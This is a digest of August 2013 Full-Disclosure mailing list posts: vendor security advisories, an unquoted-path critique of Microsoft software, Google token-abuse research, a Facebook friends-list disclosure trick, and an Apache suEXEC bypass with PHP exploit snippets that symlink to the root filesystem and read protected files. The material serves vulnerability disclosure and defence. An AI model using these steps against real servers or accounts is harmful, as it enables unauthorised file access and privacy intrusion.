Re: [Full-disclosure] Facebook allows disclosure of friends list.
Answer to your queries: Yes you are correct works on account which has been accessed once from that IP. If you are using multiple PCs, then it works on any of those machines. You need to click No longer have access to this (3rd image). Apologies for that. Works like a charmĀ in cyber cafes, esp. when users don't clear their emails after logging out. Obtaining email can be done via SE or you can obtain your friends email address using yahoo services. Regards ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Defense in depth -- the Microsoft way (part 6): beginner's errors, QA sound asleep or out of sight!
Hi, the installation of Microsofts much acclaimed security tool EMET 3.0 (see http://www.microsoft.com/emet and http://support.microsoft.com/kb/2458544) creates the following VULNERABLE registry entry that runs a rogue program C:\PROGRA.EXE (as well as C:\Program Files.exe on x64) in the security context of the user logging on: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] EMET Notifier=C:\\Program Files\\EMET\\EMET_notifier.exe ; x86 EMET Notifier=C:\\Program Files (x86)\\EMET\\EMET_notifier.exe ; x64 JFTR: the vulnerability is caused by of one of Windows' documented (see http://msdn.microsoft.com/library/ms682425.aspx) idiosyncrasies: CreateProcess() does NOT fail on calls with arguments like C:\Program Files\Common Files\Microsoft Shared\filename[.extension] but tries to execute C:\Progra.exe C:\Program Files\Common.exe C:\Program Files\Common Files\Microsoft.exe C:\Program Files\Common Files\Microsoft Shared\filename[.extension] in turn to cover BEGINNERS ERRORS of incapable developers who are unable to handle long pathnames with embedded spaces properly. Whoever decided to implement this idiosyncrasy some 20 years ago was but incapable too and did not recognize the consequences of this idiosyncrasy^Widiotic behaviour! The same beginners error is (for example) present in all versions of Microsoft Security Essentials before 4.2 and was just recently fixed with https://support.microsoft.com/kb/2805304: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Security Client] UninstallString=C:\\Program Files\\Microsoft Security Client\\Setup.exe /X Some of Microsoft's developers (and of course their QA) apparently dont know their companies own documentation; cf. http://msdn.microsoft.com/library/ms997548.aspx: | The path you supply to Uninstall-String must be the complete | command line used to carry out your uninstall program. JFTR: add/remove programs of current versions of Windows (XP SP2 and newer) mitigates this error and inserts missing quotes after the first filename or filename.extension and in front of the string. This kludge is but NOT documented! https://support.microsoft.com/kb/2781197 resp. https://support.microsoft.com/kb/2823482 alias https://technet.microsoft.com/security/bulletin/ms13-034 fixed another unquoted pathname in Windows Defender on Windows 8, while https://support.microsoft.com/kb/2847927 alias https://technet.microsoft.com/security/bulletin/ms13-058 fixed it in Windows Defender on Windows 7 and Window Server 2008 R2, where this beginners error allowed the execution of a rogue program C:\PROGRA.EXE in the security context of LocalSystem. On a fully patched Windows 7 x64 take a look at: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37efd44d-ef8d-41b1-940d-96973a50e9e0}\Shell\Open\Command] @=expand:%ProgramFiles%\\Windows Sidebar\\sidebar.exe /showGadgets [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DesktopBackground\Shell\Gadgets\command] @=C:\\Program Files\\Windows Sidebar\\sidebar.exe /showGadgets [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaServer:1\shell\Open Media Player\command] @=expand:C:\\Program Files\\Windows Media Player\\wmplayer.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.gadget\shell\open\command] @=expand:%ProgramFiles%\\Windows Sidebar\\Sidebar.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Media\Windows Media Player\shell\open\command] @=expand:%ProgramFiles(x86)%\\Windows Media Player\\wmplayer.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command] @=C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SideShow\Gadgets\{591248b9-ad35-47c2-b2fa-2d7c120adc79}] StartCommand=expand:%programFiles%\\Windows Media Player\\WMPSideShowGadget.exe [HKEY_CURRENT_USER\Software\Microsoft\Keyboard\Native Media Players\WMP] ExePath=C:\\Program Files\\Windows Media Player\\wmplayer.exe On a fully patched Windows XP take a look at: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\MPlayer2] Player.Path=C:\\Program Files\\Windows Media Player\\mplayer2.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer] Player.Path=C:\\Program Files\\Windows Media Player\\wmplayer.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\shell\open\command] @=C:\\Program Files\\Windows Media Player\\wmplayer.exe /Open %L [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\shell\play\command] @=C:\\Program Files\\Windows Media Player\\wmplayer.exe /Play %L [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSDASC\shell\open\command] @=Rundll32.exe C:\\Program Files\\Common Files\\System\\OLE DB\\oledb32.dll,OpenDSLFile %1 [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSInfo.Document\Shell\Open\Command] @=C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\MSInfo32.exe /msinfo_file %1
[Full-disclosure] Attacking Google Accounts with 'weblogin:' Tokens
For those who missed it, I would like to spread awareness about how conveniences built into the Google eco-system can allow an application, a physical user, or a forensics expert to access almost everything in your Google account. [LINKS] A nice summary from Lucian Constantine: http://www.pcworld.com/article/2045903/android-oneclick-google-authentication-method-puts-users-businesses-at-risk.html Intro Blog: http://www.tripwire.com/state-of-security/off-topic/defcon-sneak-peek-how-risky-is-google-apps-for-your-business/ DEF CON 21 slides are here: http://secur3.us/DC21Slides.pdf Brief Demo Recording: http://secur3.us/DC21-ShortDemo.mp4 Android PoC here: http://secur3.us/DC21-PoC.apk PoC Source here: http://secur3.us/DC21-PoC.java Please note that the app will send your token to my server. I am not doing anything with them but it will log your account names on my server. I would like to encourage all Android AV vendors to strive to block not just this app but any app which is sending tokens off the device. I am also recommending that any Google Apps administrator accounts should not be used with Android devices -- you wouldn't browse web sites and run untrusted code as root, would you? (i.e. follow the principle of least permission) My proof of concept used Android with AccountManager API calls but this threat extends beyond Android and likely onto anything which will run Chrome. For example, iPhone/iPad support the same feature I am abusing according to Google: http://www.google.com/intl/en/chrome/browser/mobile/ios.html and Mac/PC Chrome also definitely supports this as outlined by Duo Security's recent blog post: https://blog.duosecurity.com/2013/08/beyond-google-application-specific-password-exploiting-google-chromes-stored-oauth2-tokens/ Thanks, Craig Young Senior Security Researcher, Tripwire VERT Follow: @CraigTweets ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2013:210 ] firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:210 http://www.mandriva.com/en/support/security/ ___ Package : firefox Date: August 7, 2013 Affected: Enterprise Server 5.0 ___ Problem Description: Multiple security issues was identified and fixed in mozilla firefox: Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code (CVE-2013-1701). Mozilla security researcher moz_bug_r_a4 reported that through an interaction of frames and browser history it was possible to make the browser believe attacker-supplied content came from the location of a previous page in browser history. This allows for cross-site scripting (XSS) attacks by loading scripts from a misrepresented malicious site through relative locations and the potential access of stored credentials of a spoofed site (CVE-2013-1709). Mozilla security researcher moz_bug_r_a4 reported a mechanism to execute arbitrary code or a cross-site scripting (XSS) attack when Certificate Request Message Format (CRMF) request is generated in certain circumstances (CVE-2013-1710). Security researcher Cody Crews reported that some Javascript components will perform checks against the wrong uniform resource identifier (URI) before performing security sensitive actions. This will return an incorrect location for the originator of the call. This could be used to bypass same-origin policy, allowing for cross-site scripting (XSS) or the installation of malicious add-ons from third-party pages (CVE-2013-1713). Mozilla community member Federico Lanusse reported a mechanism where a web worker can violate same-origin policy and bypass cross-origin checks through XMLHttpRequest. This could allow for cross-site scripting (XSS) attacks by web workers (CVE-2013-1714). Security researcher Georgi Guninski reported an issue with Java applets where in some circumstances the applet could access files on the local system when loaded using the a file:/// URI and violate file origin policy due to interaction with the codebase parameter. This affects applets running on the local file system. Mozilla developer John Schoenick later discovered that fixes for this issue were inadequate and allowed the invocation of Java applets to bypass security checks in additional circumstances. This could lead to untrusted Java applets having read-only access on the local files system if used in conjunction with a method to download a file to a known or guessable path (CVE-2013-1717). The mozilla firefox packages has been upgraded to the latest ESR version (17.0.8) which is unaffected by these security flaws. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1701 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1709 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1710 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1713 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1714 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1717 http://www.mozilla.org/security/announce/2013/mfsa2013-63.html http://www.mozilla.org/security/announce/2013/mfsa2013-68.html http://www.mozilla.org/security/announce/2013/mfsa2013-69.html http://www.mozilla.org/security/announce/2013/mfsa2013-72.html http://www.mozilla.org/security/announce/2013/mfsa2013-73.html http://www.mozilla.org/security/announce/2013/mfsa2013-75.html ___ Updated Packages: Mandriva Enterprise Server 5: 46ceb0ccb376702e10d5686b24955fab mes5/i586/firefox-17.0.8-0.1mdvmes5.2.i586.rpm 3f3645b0900378ef1bce58fca5ae129c mes5/i586/firefox-af-17.0.8-0.1mdvmes5.2.i586.rpm 5a5d166e6d90d0f777e41c0e45b9ce4e mes5/i586/firefox-ar-17.0.8-0.1mdvmes5.2.i586.rpm 0f90909e08052d28fe6b26ca7c913f4e mes5/i586/firefox-be-17.0.8-0.1mdvmes5.2.i586.rpm aa3976b6a51f00949c3b589abf87f0f2 mes5/i586/firefox-bg-17.0.8-0.1mdvmes5.2.i586.rpm f58486e6bc5071825bd6e8e6ce2145bf mes5/i586/firefox-bn-17.0.8-0.1mdvmes5.2.i586.rpm 82b455ccd6a14d15a2fc9c4bcd6e977d mes5/i586/firefox-ca-17.0.8-0.1mdvmes5.2.i586.rpm 19f86d829880f9b2af4c400222c1e533 mes5/i586/firefox-cs-17.0.8-0.1mdvmes5.2.i586.rpm d8b0b922b813a7eecd9175b191e55426 mes5/i586/firefox-cy-17.0.8-0.1mdvmes5.2.i586.rpm f83f4472c502a72abf51dfb0c1e20a2c mes5/i586/firefox-da-17.0.8-0.1mdvmes5.2.i586.rpm
Re: [Full-disclosure] Facebook allows disclosure of friends list.
It does not work for all accounts. For example FB will ask me for the security question, all I can do is enter it or abort the recovery process (no option to skip it). Am 2013-08-06 20:12, schrieb Bhavesh Naik: Answer to your queries: Yes you are correct works on account which has been accessed once from that IP. If you are using multiple PCs, then it works on any of those machines. You need to click No longer have access to this (3rd image). Apologies for that. Works like a charm in cyber cafes, esp. when users don't clear their emails after logging out. Obtaining email can be done via SE or you can obtain your friends email address using yahoo services. Regards ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html [1] Hosted and sponsored by Secunia - http://secunia.com/ [2] Links: -- [1] http://lists.grok.org.uk/full-disclosure-charter.html [2] http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ MDVSA-2013:210 ] firefox
On Wed, Aug 07, 2013 at 12:36:01PM +0200, secur...@mandriva.com wrote: Security researcher Georgi Guninski reported an issue with Java Just to clarify: I haven't report _any_ issues to mozilla since years... They are not fast in fixing bugs, especially when involving other vendors. If I get pissed off, will try to find the dates about the issue in question (suspect since at least 4 years). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2735-1] iceweasel security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2735-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff August 07, 2013http://www.debian.org/security/faq - - Package: iceweasel Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-1701 CVE-2013-1709 CVE-2013-1710 CVE-2013-1713 CVE-2013-1714 CVE-2013-1717 Multiple security issues have been found in Iceweasel, Debian's version of the Mozilla Firefox web browser: Multiple memory safety errors, missing permission checks and other implementation errors may lead to the execution of arbitrary code, cross-site scripting, privilege escalation, bypass of the same-origin policy or the installation of malicious addons. The Iceweasel version in the oldstable distribution (squeeze) is no longer supported with security updates. For the stable distribution (wheezy), these problems have been fixed in version 17.0.8esr-1~deb7u1. For the unstable distribution (sid), these problems have been fixed in version 17.0.8esr-1. We recommend that you upgrade your iceweasel packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.14 (GNU/Linux) iEYEARECAAYFAlICVeQACgkQXm3vHE4uylpxcwCg0aSZ2guURbRwOCvlMCEX8SLM 6d8AoJ+EWsZdjm/dtFxRNQ4QYgPrGC92 =tept -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Apache suEXEC privilege elevation / information disclosure
Apache suEXEC privilege elevation / information disclosure Discovered by Kingcope/Aug 2013 The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs. With this bug an attacker who is able to run php or cgi code inside a web hosting environment and the environment is configured to use suEXEC as a protection mechanism, he/she is able to read any file and directory on the file- system of the UNIX/Linux system with the user and group id of the apache web server. Normally php and cgi scripts are not allowed to read files with the apache user- id inside a suEXEC configured environment. Take for example this apache owned file and the php script that follows. $ ls -la /etc/testapache -rw--- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache only user www-data should be able to read this file. $ cat test.php ?php system(id; cat /etc/testapache); ? When calling the php file using a webbrowser it will show... uid=1002(example) gid=1002(example) groups=1002(example) because the php script is run trough suEXEC. The script will not output the file requested because of a permissions error. Now if we create a .htaccess file with the content... Options Indexes FollowSymLinks and a php script with the content... ?php system(ln -sf / test99.php); symlink(/, test99.php); // try builtin function in case when //system() is blocked ? in the same folder ..we can access the root filesystem with the apache uid,gid by requesting test99.php. The above php script will simply create a symbolic link to '/'. A request to test99.php/etc/testapache done with a web browser shows.. voila! read with the apache uid/gid The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case. Version notes. Assumed is that all Apache versions are affected by this bug. apache2 -V Server version: Apache/2.2.22 (Debian) Server built: Mar 4 2013 21:32:32 Server's Module Magic Number: 20051115:30 Server loaded: APR 1.4.6, APR-Util 1.4.1 Compiled using: APR 1.4.6, APR-Util 1.4.1 Architecture: 32-bit Server MPM: Worker threaded: yes (fixed thread count) forked: yes (variable process count) Server compiled with -D APACHE_MPM_DIR=server/mpm/worker -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D APR_USE_PTHREAD_SERIALIZE -D APR_HAS_OTHER_CHILD -D AP_HAVE_RELIABLE_PIPED_LOGS -D DYNAMIC_MODULE_LIMIT=128 -D HTTPD_ROOT=/etc/apache2 -D SUEXEC_BIN=/usr/lib/apache2/suexec -D DEFAULT_PIDLOG=/var/run/apache2.pid -D DEFAULT_SCOREBOARD=logs/apache_runtime_status -D DEFAULT_ERRORLOG=logs/error_log -D AP_TYPES_CONFIG_FILE=mime.types -D SERVER_CONFIG_FILE=apache2.conf Cheers, /Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco TelePresence System Default Credentials Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Cisco Security Advisory: Cisco TelePresence System Default Credentials Vulnerability Advisory ID: cisco-sa-20130807-tp Revision 1.0 For Public Release 2013 August 7 16:00 UTC (GMT) +- Summary === A vulnerability in Cisco TelePresence System could allow a remote attacker to access the web server via a user account that is created with default credentials. The vulnerability is due to a default user account being created at installation time. An attacker could exploit this vulnerability by remotely accessing the web server and using the default account credentials. An exploit could allow the attacker to log in with the default credentials, which gives them full administrative rights to the system. Workarounds that mitigate this vulnerability are available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130807-tp -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.19 (Darwin) iF4EAREKAAYFAlICRBYACgkQUddfH3/BbTrGqQD+I5Yf/eVxV/vsUxX31XHDrLG+ NxwiFn3e1mDPMir9pGIA/jTzkeCxTTGMm5brlUQTFE0YJ3vDzXwAtp+HVzqu8i6K =tMib -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
hi... I posted the advisory to make administratos aware that it will be still possible to read files with the apache uid even when suEXEC is in place. suEXEC is installed on many hosting providers. I read the cpanel site describing the patches [1], tough standart apache httpd does not have these patches installed. SymLinksIfOwnerMatch will not help in this attack scenario because the .htaccess file overwrites this Options directive. If a hacker sees an apache installation using suEXEC from an attackers perspective it does not matter where the bug resides, either in Apache or in suEXEC. He just wants to circumvent the suEXEC protection so he can go the way described in the text I posted. This will aid him to escalate privileges further. http://docs.cpanel.net/twiki/bin/vief/EasyApache/Apache/SymlinkPatch#Frequently%20Asked%20Questions ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Updated [CVE-2013-2136] Apache CloudStack Cross-site scripting (XSS) vulnerabiliity
Issued: August 6, 2013 Updated: August 7, 2013 Product: Apache CloudStack Vendor: The Apache Software Foundation Vulnerability Type(s): Cross-site scripting (XSS) Vulnerable version(s): Apache CloudStack versions 4.0.0-incubating, 4.0.1-incubating, 4.0.2 and 4.1.0 CVE References: CVE-2013-2136 Risk Level: Low CVSSv2 Base Scores: 4 (AV:N/AC:L/Au:S/C:N/I:P/A:N) Description: The Apache CloudStack Security Team was notified of an issue found in the Apache CloudStack user interface that allows an authenticated user to execute cross-site scripting attack against other users within the system. Mitigation: Updating to Apache CloudStack versions 4.1.1 or higher will mitigate this vulnerability. Please see the 4.1.1 release notes for further information about how to upgrade: http://cloudstack.apache.org/docs/en-US/Apache_CloudStack/4.1.1/html/Release_Notes/index.html References: https://issues.apache.org/jira/browse/CLOUDSTACK-2936 Credit: This issue was identified by Oleg Boytsev from strongserver.org. pgp8QXrFjvCIb.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-062 - RESTful Web Services (RESTWS) - Access Bypass
View online: https://drupal.org/node/2059603 * Advisory ID: DRUPAL-SA-CONTRIB-2013-062 * Project: RESTful Web Services [1] (third-party module) * Version: 7.x * Date: 2013-August-07 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module enables you to expose Drupal entities as RESTful web services. It provides a machine-readable interface to exchange resources in JSON, XML and RDF. The module doesn't sufficiently check for field level access when preforming entity write operations on POST and PUT requests. It also does not check the allowed filter formats for a user for formatted text fields, thereby allowing an attacker to exploit XSS with a format that displays full HTML or even PHP code execution with a PHP code format. This vulnerability is mitigated by the fact that an attacker must have a role with a RESTWS permission such as access resource node and a permission to write entities such as create page content. PHP code execution is only possible if the PHP module is enabled. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * RESTWS 7.x-1.x versions prior to 7.x-1.4. * RESTWS 7.x-2.x versions prior to 7.x-2.1. Drupal core is not affected. If you do not use the contributed module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the RESTWS 1.x module for Drupal 7.x, upgrade to RESTWS 7.x-1.4 [4] * If you use the RESTWS 2.x module for Drupal 7.x, upgrade to RESTWS 7.x-2.1 [5] Also see the RESTful Web Services [6] project page. REPORTED BY - * Chris Oden [7] FIXED BY * Klaus Purer [8] the module maintainer * Chris Oden [9] COORDINATED BY -- * Klaus Purer [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/restws [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] https://drupal.org/node/2059591 [5] https://drupal.org/node/2059593 [6] http://drupal.org/project/restws [7] https://drupal.org/user/896508 [8] https://drupal.org/user/262198 [9] https://drupal.org/user/896508 [10] https://drupal.org/user/262198 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-064 - Persona - Cross site request forgery (CSRF)
View online: https://drupal.org/node/2059599 * Advisory ID: DRUPAL-SA-CONTRIB-2013-064 * Project: Mozilla Persona [1] (third-party module) * Version: 7.x * Date: 2013-August-07 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery DESCRIPTION - This module enables users to sign into a Drupal website using Mozilla Persona [3]. The module uses a security token to ensure that a sign-in request is made from a web page that is participating in the current session. It was possible for a security token that was not of type string to be accepted as correct regardless of it's value, thereby bypassing the protection against cross site request forgery. This vulnerability is mitigated by the fact that an attacker can only cause a victim to become signed in to an account that the attacker already has the ability to sign in to. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [4] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Persona 7.x-1.x versions prior to 7.x-1.11 Drupal core is not affected. If you do not use the contributed Mozilla Persona [5] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Mozilla Persona module for Drupal 7.x, upgrade to Persona 7.x-1.11 [6] Also see the Mozilla Persona [7] project page. REPORTED BY - * Heine Deelstra [8] of the Drupal Security Team FIXED BY * Jonathan Brown [9], the module maintainer COORDINATED BY -- * Heine Deelstra [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/persona [2] http://drupal.org/security-team/risk-levels [3] https://www.mozilla.org/persona/ [4] http://cve.mitre.org/ [5] http://drupal.org/project/persona [6] https://drupal.org/node/2058655 [7] http://drupal.org/project/persona [8] https://drupal.org/user/17943 [9] https://drupal.org/user/46104 [10] https://drupal.org/user/17943 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-063 - Authenticated User Page Caching (Authcache) - Information Disclosure
View online: https://drupal.org/node/2059589 * Advisory ID: DRUPAL-SA-CONTRIB-2013-063 * Project: Authenticated User Page Caching (Authcache) [1] (third-party module) * Version: 7.x * Date: 2013-August-07 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Information Disclosure DESCRIPTION - This module enables page caching for authenticated users. A separate version of each cacheable page is stored for each group of users with the same combination of roles. Users having the exact same role-combination like the superuser (uid=1) might access cached pages generated with the superuser. Therefore it might be possible that information is disclosed to those users intended only for the superuser. This vulnerability is mitigated by the fact that an attacker must have the exact same role-combination like the superuser. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * authcache 7.x-1.x versions prior to 7.x-1.5. Drupal core is not affected. If you do not use the contributed Authenticated User Page Caching (Authcache) [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the authcache module for Drupal 7.x, upgrade to authcache 7.x-1.5 [5] Also see the Authenticated User Page Caching (Authcache) [6] project page. REPORTED BY - * Lorenz Schori [7] the module maintainer FIXED BY * Lorenz Schori [8] the module maintainer COORDINATED BY -- * Ben Jeavons [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/authcache [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/authcache [5] http://drupal.org/node/2058165 [6] http://drupal.org/project/authcache [7] http://drupal.org/user/63999 [8] http://drupal.org/user/63999 [9] http://drupal.org/user/91990 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-065 - Organic Groups - Access Bypass
View online: https://drupal.org/node/2059765 * Advisory ID: DRUPAL-SA-CONTRIB-2013-065 * Project: Organic groups [1] (third-party module) * Version: 7.x * Date: 2013-August-07 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Access bypass, Multiple vulnerabilities DESCRIPTION - This module enables users to create and manage their own 'groups'. Each group can have subscribers, and maintains a group home page where subscribers communicate amongst themselves. The module allows any authenticated user to guess the node ID of private groups, and subscribe to them without approval, thus being able to see their content. This vulnerability is mitigated by the fact that the permissions to subscribe are set to allow without approval. Furthermore, misconfiguration of the OG access fields (a.k.a visibility fields) could have lead to nodes not being private even though a site admin would expect them to be private, due to the group default setting. This vulnerability is mitigated by requiring a non-default configuration where the Group visibility field was not attached to the group node, and only the Group content visibility was attached to the group-content node. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * OG 7.x-2.x versions prior to 7.x-2.3. Drupal core is not affected. If you do not use the contributed Organic groups [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Organic groups module for Drupal 7.x, upgrade to OG 7.x-2.3 [5] Also see the Organic groups [6] project page. REPORTED BY - * Nic Ivy [7] * Hunter Fox [8] of the Drupal Security Team FIXED BY * Amitai Burstein [9] the module maintainer * Roy Segall [10] from Gizra * Hunter Fox [11] of the Drupal Security Team COORDINATED BY -- * Hunter Fox [12] of the Drupal Security Team * David Stoline [13] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14]. Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17]. [1] http://drupal.org/project/og [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/og [5] https://drupal.org/node/2059755 [6] http://drupal.org/project/og [7] https://drupal.org/user/6194 [8] https://drupal.org/user/426416 [9] https://drupal.org/user/57511 [10] https://drupal.org/user/1812910 [11] https://drupal.org/user/426416 [12] https://drupal.org/user/426416 [13] https://drupal.org/user/329570 [14] http://drupal.org/contact [15] http://drupal.org/security-team [16] http://drupal.org/writing-secure-code [17] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
On 2013-08-07, at 09:08, king cope isowarez.isowarez.isowa...@googlemail.com wrote: SymLinksIfOwnerMatch will not help in this attack scenario because the .htaccess file overwrites this Options directive AllowOverride can be used to prevent this as well by specifying a set of values for Options which does not include FollowSymlinks, e.g. AllowOverride AuthConfig FileInfo Indexes Limit Options=ExecCGI,Includes,Indexes,MultiViews,SymlinksIfOwnerMatch ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-066 - Monster Menus - Multiple Vulnerabilities
